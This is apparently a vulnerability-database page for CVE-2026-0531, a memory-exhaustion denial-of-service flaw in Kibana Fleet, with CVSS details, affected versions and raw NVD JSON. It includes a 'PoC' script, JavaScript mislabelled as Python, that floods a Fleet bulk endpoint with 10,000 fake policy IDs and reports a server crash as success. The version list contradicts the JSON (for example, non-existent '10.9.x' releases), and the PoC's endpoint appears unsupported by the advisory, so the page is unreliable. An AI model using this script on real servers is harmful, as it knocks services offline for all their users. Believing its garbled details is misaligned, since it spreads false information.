Security Vulnerability Report
中文
CVE-2026-0531 CVSS 6.5 MEDIUM

CVE-2026-0531

Published: 2026-01-13 21:15:51
Last Modified: 2026-01-22 19:59:54
Source: [email protected]

Description

Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE
Kibana 8.19.x < 8.19.10
Kibana 9.1.x < 9.1.10
Kibana 10.9.x < 10.9.2
Kibana 10.9.x < 10.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0531 PoC - Kibana Fleet Resource Exhaustion // Requires viewer role privileges const axios = require('axios'); async function exploitCVE20260531(baseUrl, apiToken) { const headers = { 'Authorization': `Bearer ${apiToken}`, 'Content-Type': 'application/json', 'kbn-xsrf': 'true' }; // Generate large list of policy IDs to trigger resource exhaustion const policyIds = []; for (let i = 0; i < 10000; i++) { policyIds.push(`policy-${i}-${Date.now()}`); } // Craft malicious bulk retrieval request const payload = { policyIds: policyIds, includeRelatedData: true, fetchFullDetails: true }; try { // Send the crafted request const response = await axios.post( `${baseUrl}/api/fleet/policies/bulk_retrieve`, payload, { headers: headers, timeout: 30000 } ); console.log('Request sent, server may become unresponsive'); } catch (error) { if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT') { console.log('SUCCESS: Server crashed - connection refused/timeout'); } else { console.log('Request completed with:', error.message); } } } // Usage // exploitCVE20260531('https://vulnerable-kibana:5601', 'viewer-token');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0531", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:50.990", "lastModified": "2026-01-22T19:59:54.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allocation of Resources Without Limits or Throttling (CWE-770) in Kibana Fleet can lead to Excessive Allocation (CAPEC-130) via a specially crafted bulk retrieval request. This requires an attacker to have low-level privileges equivalent to the viewer role, which grants read access to agent policies. The crafted request can cause the application to perform redundant database retrieval operations that immediately consume memory until the server crashes and becomes unavailable to all users."}, {"lang": "es", "value": "Asignación de Recursos Sin Límites o Limitación (CWE-770) en Kibana Fleet puede conducir a una Asignación Excesiva (CAPEC-130) a través de una solicitud de recuperación masiva especialmente diseñada. Esto requiere que un atacante tenga privilegios de bajo nivel equivalentes al rol de visor, que otorga acceso de lectura a las políticas de agente. La solicitud diseñada puede hacer que la aplicación realice operaciones redundantes de recuperación de base de datos que consumen memoria inmediatamente hasta que el servidor se bloquea y deja de estar disponible para todos los usuarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.10.0", "versionEndExcluding": "7.17.29", "matchCriteriaId": "1863989E-58AD-4481-B872-DF5AC637F854"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.10", "matchCriteriaId": "8707CF69-9922-490B-B64F-38F2D31E2CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-04/384522", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.